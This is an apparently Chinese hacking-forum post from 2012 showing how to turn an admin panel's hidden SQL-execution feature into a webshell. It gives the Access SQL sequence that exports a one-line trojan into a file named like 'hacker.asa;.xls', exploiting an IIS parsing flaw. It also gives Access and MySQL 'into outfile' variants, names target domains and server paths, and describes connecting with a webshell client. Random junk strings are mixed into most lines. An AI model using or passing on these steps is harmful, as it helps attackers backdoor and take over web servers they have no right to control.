找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2002|回复: 0
打印 上一主题 下一主题

ACCESS执行SQL命令导出一句话SHELL

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:53:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好不容易进了后台,发现啥上传啊。备份啊多木有。
& u; K: N8 Z# M% }webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的
3 y  a. ~" ]* Z# M: E/ _4 z5 Y文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,
  _+ E* b( l; I$ J然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:
2 D3 ?8 f2 ~, i% X$ {1.create table cmd (a varchar(50))
+ G& \, S$ _2 d3 I' Y4 g8 c) @( D2.insert into cmd (a) values (‘‘)5 w" Z8 q2 x! I
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd0 m8 V3 `( Y7 ~) d& o" q- V
(把表cmd的内容导出为物理路径的一个EXCEL文件)' [, k9 x( A3 r( X9 K2 [, W# M
4.drop table cmd
4 \( O3 q4 b# {利用IIS的BUG成功拿到了WEBSHELL。. F: n9 v. j& R  E
  I. p/ m' I. t4 R4 ]
直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话! m/ X) w; t5 N
6 [9 H$ t9 D: K, H
  SQL语句意思解释:1 l. v$ Z0 |# e
  第一句
+ o/ i1 Y7 J) O8 q  建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为50
2 s/ [8 C# P/ ?( j4 v4 E+ d3 t8 _( J0 T' _7 j4 N
  第二句; o$ L! r1 i% A( [" H! ?3 P) A8 F' o
  在表cmd的a字段插入一句话木马
8 }% H8 V8 y' O3 K9 H  第三句) m  w. q" C, g2 `
  把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
. \! @6 Z7 s4 W
9 |) l" q# E) T% {" c1 l  第四句! \; h" g: p& q4 V5 D4 \% P( g
  删除建立的cmd表
. i( S# r0 ~5 m4 V9 ]' W4 Y
8 X& K$ V. h: J# Q% W. E& a  以下内容为测试:
0 |- D/ Y9 k0 H/ }  Access利用后台SQL执行命令功能导出WebShell:2 k( D) F" i; o; V: V
  这个更简单:0 y& i; d# S: C) @9 ^, m
  [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]
# }( t$ E1 {4 p* V& U  或者! w$ I5 v5 b' T( L4 a
  [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]1 ?. x8 H, g0 ?, @- d$ J3 G
  c& Y0 n5 d% S$ Z
  后台有执行SQL语句功能(vote为已知表段)
9 M, Q8 \' M/ f2 q' \6 m0 `7 V. a  希望对大家有所帮助拿shell的又一个思路
2 W; B' [" ?% w+ o0 D
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表